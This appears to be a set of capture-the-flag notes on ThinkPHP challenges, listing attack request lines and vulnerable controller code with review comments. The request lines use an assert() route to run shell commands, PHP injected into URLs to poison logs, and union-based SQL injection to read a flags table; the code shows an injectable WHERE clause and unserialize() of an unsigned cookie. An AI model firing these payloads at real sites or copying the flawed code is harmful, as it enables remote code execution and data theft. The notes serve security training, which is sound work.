GET ?s=Admin/Login/ctfshowLogin
GET ?s=/ctfshow/assert/assert($_POST['shell'])
POST shell=system('cat /flag_is_here')
GET /?s=Home/index/index&n=<?php var_dump(system('cat /fl*')); ?>
/Application/Runtime/Logs/Home/21_§04§_§15§.log
/index.php?showctf=<?php var_dump(system('cat /fl*')); ?>
?id[where]=id=-1 union select 1,group_concat(flag4s),3,4 from flags
/**
 * Queries the Users model for a row matching the given id, then passes $html to show().
 *
 * @param mixed $id Record id, defaults to 1. The request line that follows this listing supplies it as ?id=.
 */
public function index($id=1){
// SQL injection sink: $id is concatenated into the WHERE string unchanged, so any SQL it
// contains becomes part of the query. Fix: cast it first (intval($id)) or use the framework's
// placeholder form, where('id=%d', $id), so the value is formatted as an integer.
$name = M('Users')->where('id='.$id)->find();
// NOTE(review): $html is never assigned in this excerpt and $name is not used afterwards;
// presumably lines were omitted from the listing. Confirm against the full controller.
$this->show($html);
}
/?id=-1) union select 1,group_concat(flag4s),3,4 from flags#
// Deserialization of client-controlled data: the 'user' cookie is base64-decoded and handed to
// unserialize(), so whoever sets the cookie chooses the type and properties of $user.
// Safer designs: keep the user record in the server-side session, or store JSON and authenticate
// it with an HMAC (verify with hash_equals()). At minimum, pass ['allowed_classes' => false]
// as the second argument of unserialize() so no objects are instantiated.
$user= unserialize(base64_decode(cookie('user')));
// Cache check: reload only when nothing usable was decoded or the decoded value's id is not
// identical to $id. When the check passes, the value built from the cookie is used as-is below.
if(!$user || $user->id!==$id){
$user = M('Users');
// intval() forces the lookup key to an integer before it reaches the query.
$user->find(intval($id));
// The model's data() is serialized back into the cookie without a signature, so a later
// request cannot distinguish this server-written value from a forged one.
cookie('user',base64_encode(serialize($user->data())));
}
// NOTE(review): on the cache-hit path username comes straight from the cookie. If show()
// interprets its argument as template or markup, escape or validate it first. Confirm
// against the framework's documentation.
$this->show($user->username);
// Closes the enclosing method; its signature is not part of this excerpt.
}